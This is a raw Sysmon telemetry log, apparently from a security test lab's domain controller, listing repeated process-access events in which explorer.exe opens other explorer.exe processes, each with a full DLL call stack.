22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.130{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 